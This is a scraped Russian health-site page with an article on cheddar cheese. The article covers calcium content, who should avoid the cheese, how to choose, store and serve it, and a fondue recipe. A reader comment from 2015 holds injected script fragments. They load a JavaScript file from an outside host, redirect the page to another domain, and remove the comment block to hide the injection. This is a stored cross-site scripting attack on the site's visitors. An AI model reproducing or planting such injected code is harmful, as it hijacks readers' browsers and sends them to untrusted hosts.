Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Чеддер. Английский сыр дл...  >>  Чеддер. Английский сыр для костей
 
Обратная связь
 

Чеддер. Английский сыр для костей

Размер шрифта
20 декабря 2011 07:13
  • google_analytics: false
  • Нравится

Сохранить кости крепкими, а ум ясным поможет сыр чеддер. Как выбрать, как хранить и как приготовить этот настоящий английский сыр?

Чеддер – сорт полутвердого сыра, который делают в Англии, но любят во всем мире. Настоящим сыром чеддер называют тот, что сделан в одном из четырех графств Англии в Сомерсете, Девоне, Дорсете или Корнуолле. Сыр, произведенный в этих районах, имеет категорию PDO (Protected Designation of Origin) и защищен законом ЕС.

Достоинства чеддера

В чеддере много кальция, а значит, он полезен тем, кто хочет сохранить здоровье костей.

Пьедестал почета по содержанию кальция
1. Пармезан – 1109 мг
2. Чеддер – 1000 мг
3. Рокфор – 740 мг

Суточная доза – 100 г сыра удовлетворяет суточную потребность организма в кальции на 100% и на 30% – в фосфоре.

Недостатки чеддера

Если у вас непереносимость молочного белка, вам противопоказан сыр, как и любые другие молочные продукты. Тем более он противопоказан людям с гастритом и колитами. С осторожностью чеддер следует есть людям с избыточным весом и гипертоникам, страдающим сердечными отеками.

Как выбрать

  • У настоящего чеддера слегка кисловатый и ореховый привкус.
  • Мякоть – желтовато-белая с серовато-коричневой коркой.
  • Если чеддер желтого или оранжевого цвета – это тоже нормально.

Как хранить

  • Слишком низкая и слишком высокая температура разрушают структуру сыра, при высокой влажности сыр испортится, а при низкой – засохнет.
  • Оптимальная температура от 0 до 8 градусов, влажность 80-85%.
  • Сыр лучше покупать отдельным куском и хранить в пластиковом контейнере. Тогда он не высохнет.
  • Сыр впитывает посторонние запахи и передает свой запах другим продуктам. Если вы решили завернуть сыр в фольгу или пленку, меняйте эту обертку раз в 3-4 дня.
  • Маленькие куски сыра долго хранятся в стеклянной посуде под крышкой в холодильнике.
  • Чтобы сыр не впитывал лишнюю влагу, положите рядом с ним кусочек сахара и периодически меняйте его. Сахар впитает жидкость, а сыр не пересохнет.

Как готовить

Доставать сыр из холодильника нужно за полчаса до подачи на стол, чтобы он восстановил свою изначальную консистенцию и сырный аромат. Нарезают сыр квадратными кубиками или треугольными сегментами. Чеддер используется в производстве соленых бисквитов, в салатах, канапе.

Рецепт фондю с чеддером

1. Нарезать кусок сыра на кубики и положить в керамическую форму.
2. Запекать в духовке, пока сыр не расплавится.
3. Подавать с кусочками хрустящего хлеба или свежими порезанными овощами для обмакивания в сыр.

Видеосюжеты по теме:

Сыр чеддер. Чисто английский сыр



  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:02

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
3 теста, если вас беспокоят судороги в ногах   Женщины, которые пьют больше 3-х стаканов молока в день, умрут раньше остальных!   Микроэлементы, дефицит которых ведет к обжорству   Что морщины расскажут о вас  
25 апреля 2013Оказывается, не все молочные продукты хороши для костей! А некоторые вообще портят кости! 19 декабря 2012Газированные напитки увеличивают риск артрита
 
29 ноября 2012Ученые победили мышечную слабость 20 июля 2012Кости можно делать из жира!
 

Слайдшоу

1
Миостимулятор OMRON E4
10 вещей, которые тормозят вас на пути к стройности!
Под лежачий камень вода не течет! Камни в почках!

Тесты

1
Есть ли у вас гормональные нарушения
Что вы знаете о мышцах?
Что вы знаете о почках?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.